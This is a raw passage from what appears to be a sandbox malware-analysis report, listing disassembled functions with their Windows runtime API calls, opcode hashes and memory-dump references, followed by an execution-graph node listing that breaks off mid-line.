                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 43a44e934bd1a11246ff82d6d7f33e14b0d673f0140b9c3a4929d3bbc7f0d2a2
                                                                                                                                                                                                                                                • Instruction ID: 8d85dce5f5d8afdafc3aecf8f5a5116d6ed9f04b49fdf2a1cabe604a446eb132
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43a44e934bd1a11246ff82d6d7f33e14b0d673f0140b9c3a4929d3bbc7f0d2a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22E04830644255BBEF141BA0DD09B1D3F79BB05B41F250420FB0CEC9D1DF71A951BA86
                                                                                                                                                                                                                                                Function 6D59F825 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(6B7C042E,00000000,00000000,?), ref: 6D59F888
                                                                                                                                                                                                                                                  • Part of subcall function 6D59D25C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D59F2C3,?,00000000,-00000008), ref: 6D59D2BD
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6D59FADA
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D59FB20
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 6D59FBC3
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                                                                                                • Opcode ID: dcfae1a56538cadb8e8568e1573a6b60badb7b5f00c80a89dbf801ab91861390
                                                                                                                                                                                                                                                • Instruction ID: b1560dad5445e38dfdfe23e64e53f40f6f37b15075aa05db733fd6defe4b558c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcfae1a56538cadb8e8568e1573a6b60badb7b5f00c80a89dbf801ab91861390
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BD19DB1D042999FCF09CFA8C890AEDBBB5FF49314F28852AE515EB751D730A941CB50
                                                                                                                                                                                                                                                Function 6D59BEA8 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 6D59D25C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D59F2C3,?,00000000,-00000008), ref: 6D59D2BD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 6D59BF0C
                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6D59BF13
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6D59BF4D
                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 6D59BF54
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1913693674-0
                                                                                                                                                                                                                                                • Opcode ID: 329a99ae3cdd36d5fb14a4b19a4d3df59a9a846551d3a581c32a0135109f3213
                                                                                                                                                                                                                                                • Instruction ID: f5e46cb01292b07062dd620d9973d6d70367766481fce40b70667c1735b5d018
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 329a99ae3cdd36d5fb14a4b19a4d3df59a9a846551d3a581c32a0135109f3213
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1121863160829AAFEB18AF65C9C096A77BDFF853687118919FA19DF950D730EC008B50
                                                                                                                                                                                                                                                Function 6D59D2FF Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6D59D307
                                                                                                                                                                                                                                                  • Part of subcall function 6D59D25C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D59F2C3,?,00000000,-00000008), ref: 6D59D2BD
                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D59D33F
                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D59D35F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 158306478-0
                                                                                                                                                                                                                                                • Opcode ID: 44f49979bff2c67991137ce426d6934c2d26b70e10d2cbf4e24b37ce09ea29f8
                                                                                                                                                                                                                                                • Instruction ID: 900e3af49cfc1dab0012cbbdb9f0654aea1275fc82d18e865546d2bdabd10784
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44f49979bff2c67991137ce426d6934c2d26b70e10d2cbf4e24b37ce09ea29f8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C1104F15196A5BFAB0917B59CC8DBF3A6CEEDA2D93160816F505D9900EF30CD0081B0
                                                                                                                                                                                                                                                Function 6D5A11A6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6D5A095A,00000000,00000001,00000000,?,?,6D59FC17,?,00000000,00000000), ref: 6D5A11BD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,6D5A095A,00000000,00000001,00000000,?,?,6D59FC17,?,00000000,00000000,?,?,?,6D5A01BB,00000000), ref: 6D5A11C9
                                                                                                                                                                                                                                                  • Part of subcall function 6D5A118F: CloseHandle.KERNEL32(FFFFFFFE,6D5A11D9,?,6D5A095A,00000000,00000001,00000000,?,?,6D59FC17,?,00000000,00000000,?,?), ref: 6D5A119F
                                                                                                                                                                                                                                                • ___initconout.LIBCMT ref: 6D5A11D9
                                                                                                                                                                                                                                                  • Part of subcall function 6D5A1151: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D5A1180,6D5A0947,?,?,6D59FC17,?,00000000,00000000,?), ref: 6D5A1164
                                                                                                                                                                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6D5A095A,00000000,00000001,00000000,?,?,6D59FC17,?,00000000,00000000,?), ref: 6D5A11EE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                                                                                • Opcode ID: 9a8d4f73bb38884c34da178a8e82e6315bc5f4189b40bbdc2ba4950ea66dd536
                                                                                                                                                                                                                                                • Instruction ID: ed6e83088dc96c26356be1bb3417a766abc3906aeff1002d115387a1079ef235
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a8d4f73bb38884c34da178a8e82e6315bc5f4189b40bbdc2ba4950ea66dd536
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F0F836104179BBCF121EE1CC14EAE3F76FB492A1B194410FA1889920DB328C20EB91
                                                                                                                                                                                                                                                Function 6D5A00D9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 6D59F825: GetConsoleOutputCP.KERNEL32(6B7C042E,00000000,00000000,?), ref: 6D59F888
                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,?,00000000,?,?,6D59E141,?), ref: 6D5A025E
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,6D59E141,?,6D59DFD4,00000000,?,00000000,6D59DFD4,?,00000000,00000000,6D5A98C0,0000002C,6D59E045,?), ref: 6D5A0268
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                                                                • String ID: AYm
                                                                                                                                                                                                                                                • API String ID: 2915228174-263184403
                                                                                                                                                                                                                                                • Opcode ID: 495e2f8183136c99db47cb24d14a829e6d8145d5641a579769986df16d013f39
                                                                                                                                                                                                                                                • Instruction ID: beaca8718507df8398bf8662d1a554a168f2084f6cef4fcd8dbd9d230651c688
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 495e2f8183136c99db47cb24d14a829e6d8145d5641a579769986df16d013f39
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D961A37191426AAFDF05CFADCC84AEE7FB9BF49304F080546E914AB609D331D905CBA1
                                                                                                                                                                                                                                                Function 6D59988F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 6D5998B4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 3d1254a6c9ccb2537d42ddffa079d9bcdae08c8b48a48a10355e625173eaa8bf
                                                                                                                                                                                                                                                • Instruction ID: 2a93d652723834fcd63dfe69c7648e477b91d82fb36de92ebf879c1f8f9377d3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d1254a6c9ccb2537d42ddffa079d9bcdae08c8b48a48a10355e625173eaa8bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E341BD7190024AAFCF0ACFA4CC80AEE7BB5FF48304F159458FA086B611D3359950CF92
                                                                                                                                                                                                                                                Function 6D59D708 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 6D59D748
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                                                • String ID: InitializeCriticalSectionEx$U|Ym
                                                                                                                                                                                                                                                • API String ID: 2593887523-3525665559
                                                                                                                                                                                                                                                • Opcode ID: 5608eb7fe21ab3a44a87e4518ae365c9245e77f94c4433e8f790a96da734ebca
                                                                                                                                                                                                                                                • Instruction ID: c1c1cde64383944a5f449b4ff8c278fbaf551f9e91425ac4b36f883b31507bb7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5608eb7fe21ab3a44a87e4518ae365c9245e77f94c4433e8f790a96da734ebca
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 98E09232040178BBCF161F90DC08EBE3F22EB84771F098021F92C5A911CF3288219780
                                                                                                                                                                                                                                                Function 6D59D609 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Alloc
                                                                                                                                                                                                                                                • String ID: FlsAlloc$U|Ym
                                                                                                                                                                                                                                                • API String ID: 2773662609-712174389
                                                                                                                                                                                                                                                • Opcode ID: 49952a89a3e88653ab05ec3c6c39c9977d57aa400b4db9c1c9d784aa3385a618
                                                                                                                                                                                                                                                • Instruction ID: 666c76ca428b35d4169da8d96bd6859ef324ec4cdee8d2f854e48a1e2988e27e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49952a89a3e88653ab05ec3c6c39c9977d57aa400b4db9c1c9d784aa3385a618
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95E0C2314801B4B7CA092AF1CC08EBD7E14DBE5771B0A0022FA3C5AA028E7048114AEA

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:15.6%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                Signature Coverage:0.7%
                                                                                                                                                                                                                                                Total number of Nodes:402
                                                                                                                                                                                                                                                Total number of Limit Nodes:28
                                                                                                                                                                                                                                                execution_graph 105860 153eed0 DuplicateHandle 105861 153ef66 105860->105861 106248 1534cc0 106249 1534cd2 106248->106249 106250 1534cdd 106249->106250 106252 1534de8 106249->106252 106253 1534e0d 106252->106253 106257 1534ee8 106253->106257 106261 1534ef8 106253->106261 106259 1534f1f 106257->106259 106258 1534ffc 106258->106258 106259->106258 106265 15348a0 106259->106265 106263 1534f1f 106261->106263 106262 1534ffc 106262->106262 106263->106262 106264 15348a0 CreateActCtxA 106263->106264 106264->106262 106266 1535f88 CreateActCtxA 106265->106266 106268 153604b 106266->106268 106269 153c4f0 106272 153c5d9 106269->106272 106270 153c4ff 106273 153c5f9 106272->106273 106274 153c61c 106272->106274 106273->106274 106275 153c820 GetModuleHandleW 106273->106275 106274->106270 106276 153c84d 106275->106276 106276->106270 106314 153e880 106315 153e8c6 GetCurrentProcess 106314->106315 106317 153e911 106315->106317 106318 153e918 GetCurrentThread 106315->106318 106317->106318 106319 153e955 GetCurrentProcess 106318->106319 106320 153e94e 106318->106320 106323 153e98b 106319->106323 106320->106319 106321 153e9b3 GetCurrentThreadId 106322 153e9e4 106321->106322 106323->106321 105862 71c3418 105863 71c343c 105862->105863 105866 71c345e 105863->105866 105869 7601a31 105863->105869 105876 7601a40 105863->105876 105883 7606980 105863->105883 105890 7606970 105863->105890 105871 7601a40 105869->105871 105870 7601b3f 105870->105866 105871->105870 105897 7601ce0 105871->105897 105908 7601cf0 105871->105908 105919 7601d29 105871->105919 105930 7601d70 105871->105930 105878 7601a64 105876->105878 105877 7601b3f 105877->105866 105878->105877 105879 7601d70 4 API calls 105878->105879 105880 7601ce0 4 API calls 105878->105880 105881 7601cf0 4 API calls 105878->105881 105882 7601d29 4 API calls 105878->105882 105879->105877 105880->105877 105881->105877 105882->105877 105884 76069a4 105883->105884 105886 7606afd 105884->105886 106110 7608b22 105884->106110 105886->105866 105891 76069a4 105890->105891 105893 7606afd 105891->105893 105896 7608b22 4 API calls 105891->105896 105892 7606a9e 105894 7478e80 4 API calls 105892->105894 105895 7478e90 4 API calls 105892->105895 105893->105866 105894->105893 105895->105893 105896->105892 105898 7601ce3 105897->105898 105898->105870 105900 7601d70 4 API calls 105898->105900 105947 7602a18 105898->105947 105953 7602550 105898->105953 105959 7602a23 105898->105959 105965 7601d80 105898->105965 105971 7602a1a 105898->105971 105977 76029bd 105898->105977 105983 7602a33 105898->105983 105899 7601d65 105899->105870 105900->105899 105909 7601ce3 105908->105909 105909->105870 105909->105908 105911 7601d70 4 API calls 105909->105911 105912 7601d80 4 API calls 105909->105912 105913 7602550 4 API calls 105909->105913 105914 7602a23 4 API calls 105909->105914 105915 7602a33 4 API calls 105909->105915 105916 7602a18 4 API calls 105909->105916 105917 7602a1a 4 API calls 105909->105917 105918 76029bd 4 API calls 105909->105918 105910 7601d65 105910->105870 105911->105910 105912->105910 105913->105910 105914->105910 105915->105910 105916->105910 105917->105910 105918->105910 105920 7601ce3 105919->105920 105920->105870 105920->105919 105922 7601d70 4 API calls 105920->105922 105923 7601d80 4 API calls 105920->105923 105924 7602550 4 API calls 105920->105924 105925 7602a23 4 API calls 105920->105925 105926 7602a33 4 API calls 105920->105926 105927 7602a18 4 API calls 105920->105927 105928 7602a1a 4 API calls 105920->105928 105929 76029bd 4 API calls 105920->105929 105921 7601d65 105921->105870 105922->105921 105923->105921 105924->105921 105925->105921 105926->105921 105927->105921 105928->105921 105929->105921 105931 7601d76 105930->105931 105933 7601ce3 105930->105933 105931->105933 105935 7601d7e 105931->105935 105932 7601d65 105932->105870 105933->105870 105936 7601d70 4 API calls 105933->105936 105937 7601d80 4 API calls 105933->105937 105938 7602550 4 API calls 105933->105938 105939 7602a23 4 API calls 105933->105939 105940 7602a33 4 API calls 105933->105940 105941 7602a18 4 API calls 105933->105941 105942 7602a1a 4 API calls 105933->105942 105943 76029bd 4 API calls 105933->105943 105934 7602a59 105934->105934 105935->105934 105944 76034c0 4 API calls 105935->105944 105945 76034d0 4 API calls 105935->105945 105946 76036e8 4 API calls 105935->105946 105936->105932 105937->105932 105938->105932 105939->105932 105940->105932 105941->105932 105942->105932 105943->105932 105944->105935 105945->105935 105946->105935 105949 7601e85 105947->105949 105948 7602a59 105948->105948 105949->105948 105989 76034d0 105949->105989 105993 76034c0 105949->105993 105997 76036e8 105949->105997 105954 7601e85 105953->105954 105955 7602a59 105954->105955 105956 76034c0 4 API calls 105954->105956 105957 76034d0 4 API calls 105954->105957 105958 76036e8 4 API calls 105954->105958 105955->105955 105956->105954 105957->105954 105958->105954 105961 7601e85 105959->105961 105960 7602a59 105960->105960 105961->105960 105962 76036e8 4 API calls 105961->105962 105963 76034c0 4 API calls 105961->105963 105964 76034d0 4 API calls 105961->105964 105962->105961 105963->105961 105964->105961 105967 7601dad 105965->105967 105966 7602a59 105966->105966 105967->105966 105968 76036e8 4 API calls 105967->105968 105969 76034c0 4 API calls 105967->105969 105970 76034d0 4 API calls 105967->105970 105968->105967 105969->105967 105970->105967 105973 7601e85 105971->105973 105972 7602a59 105972->105972 105973->105972 105974 76034c0 4 API calls 105973->105974 105975 76034d0 4 API calls 105973->105975 105976 76036e8 4 API calls 105973->105976 105974->105973 105975->105973 105976->105973 105979 7601e85 105977->105979 105978 7602a59 105978->105978 105979->105978 105980 76036e8 4 API calls 105979->105980 105981 76034c0 4 API calls 105979->105981 105982 76034d0 4 API calls 105979->105982 105980->105979 105981->105979 105982->105979 105985 7601e85 105983->105985 105984 7602a59 105984->105984 105985->105984 105986 76034c0 4 API calls 105985->105986 105987 76034d0 4 API calls 105985->105987 105988 76036e8 4 API calls 105985->105988 105986->105985 105987->105985 105988->105985 105990 76034f7 105989->105990 105992 76036e8 4 API calls 105990->105992 105991 760358d 105991->105949 105992->105991 105994 76034cd 105993->105994 105996 76036e8 4 API calls 105994->105996 105995 760358d 105995->105949 105996->105995 105998 7603702 105997->105998 106002 7603738 105998->106002 106011 7603728 105998->106011 105999 760371a 105999->105949 106003 760375f 106002->106003 106005 760384e 106003->106005 106020 760391a 106003->106020 106004 76037c6 106025 7605df9 106004->106025 106031 7606548 106004->106031 106037 7606538 106004->106037 106043 7606611 106004->106043 106005->105999 106012 7603738 106011->106012 106014 760384e 106012->106014 106015 760391a 2 API calls 106012->106015 106013 76037c6 106016 7606611 2 API calls 106013->106016 106017 7606548 2 API calls 106013->106017 106018 7606538 2 API calls 106013->106018 106019 7605df9 2 API calls 106013->106019 106014->105999 106015->106013 106016->106014 106017->106014 106018->106014 106019->106014 106021 7603935 106020->106021 106048 7603b70 106021->106048 106053 7603b80 106021->106053 106022 76039b3 106022->106004 106027 7606544 106025->106027 106026 76065b8 106026->106005 106027->106026 106079 7606708 106027->106079 106083 7606718 106027->106083 106028 760664e 106028->106005 106033 760655a 106031->106033 106032 76065b8 106032->106005 106033->106032 106035 7606708 2 API calls 106033->106035 106036 7606718 2 API calls 